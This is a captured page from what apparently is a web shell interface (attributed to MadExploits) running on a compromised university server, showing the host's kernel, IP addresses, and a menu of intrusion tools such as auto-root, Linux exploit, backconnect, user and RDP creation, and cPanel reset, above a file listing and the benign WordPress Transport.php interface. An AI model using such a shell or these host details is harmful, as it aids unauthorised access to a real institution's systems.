Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.133.160.239
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
www /
html /
aaou /
wp-includes /
Requests /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Auth
[ DIR ]
drwxrwxr-x
Cookie
[ DIR ]
drwxrwxr-x
Exception
[ DIR ]
drwxrwxr-x
Proxy
[ DIR ]
drwxrwxr-x
Response
[ DIR ]
drwxrwxr-x
Transport
[ DIR ]
drwxrwxr-x
Utility
[ DIR ]
drwxrwxr-x
Auth.php
860
B
-rw-rw-r--
Autoload.php
9.12
KB
-rw-rw-r--
Capability.php
652
B
-rw-rw-r--
Cookie.php
14.75
KB
-rw-rw-r--
Exception.php
1.09
KB
-rw-rw-r--
HookManager.php
709
B
-rw-rw-r--
Hooks.php
2.96
KB
-rw-rw-r--
IdnaEncoder.php
12.14
KB
-rw-rw-r--
Ipv6.php
5.51
KB
-rw-rw-r--
Iri.php
28.93
KB
-rw-rw-r--
Port.php
1.47
KB
-rw-rw-r--
Proxy.php
867
B
-rw-rw-r--
Requests.php
33.2
KB
-rw-rw-r--
Response.php
4.18
KB
-rw-rw-r--
Session.php
8.89
KB
-rw-rw-r--
Ssl.php
5.3
KB
-rw-rw-r--
Transport.php
1.51
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Transport.php
<?php /** * Base HTTP transport * * @package Requests\Transport */ namespace WpOrg\Requests; /** * Base HTTP transport * * @package Requests\Transport */ interface Transport { /** * Perform a request * * @param string $url URL to request * @param array $headers Associative array of request headers * @param string|array $data Data to send either as the POST body, or as parameters in the URL for a GET/HEAD * @param array $options Request options, see {@see \WpOrg\Requests\Requests::response()} for documentation * @return string Raw HTTP result */ public function request($url, $headers = [], $data = [], $options = []); /** * Send multiple requests simultaneously * * @param array $requests Request data (array of 'url', 'headers', 'data', 'options') as per {@see \WpOrg\Requests\Transport::request()} * @param array $options Global options, see {@see \WpOrg\Requests\Requests::response()} for documentation * @return array Array of \WpOrg\Requests\Response objects (may contain \WpOrg\Requests\Exception or string responses as well) */ public function request_multiple($requests, $options); /** * Self-test whether the transport can be used. * * The available capabilities to test for can be found in {@see \WpOrg\Requests\Capability}. * * @param array<string, bool> $capabilities Optional. Associative array of capabilities to test against, i.e. `['<capability>' => true]`. * @return bool Whether the transport can be used. */ public static function test($capabilities = []); }
Close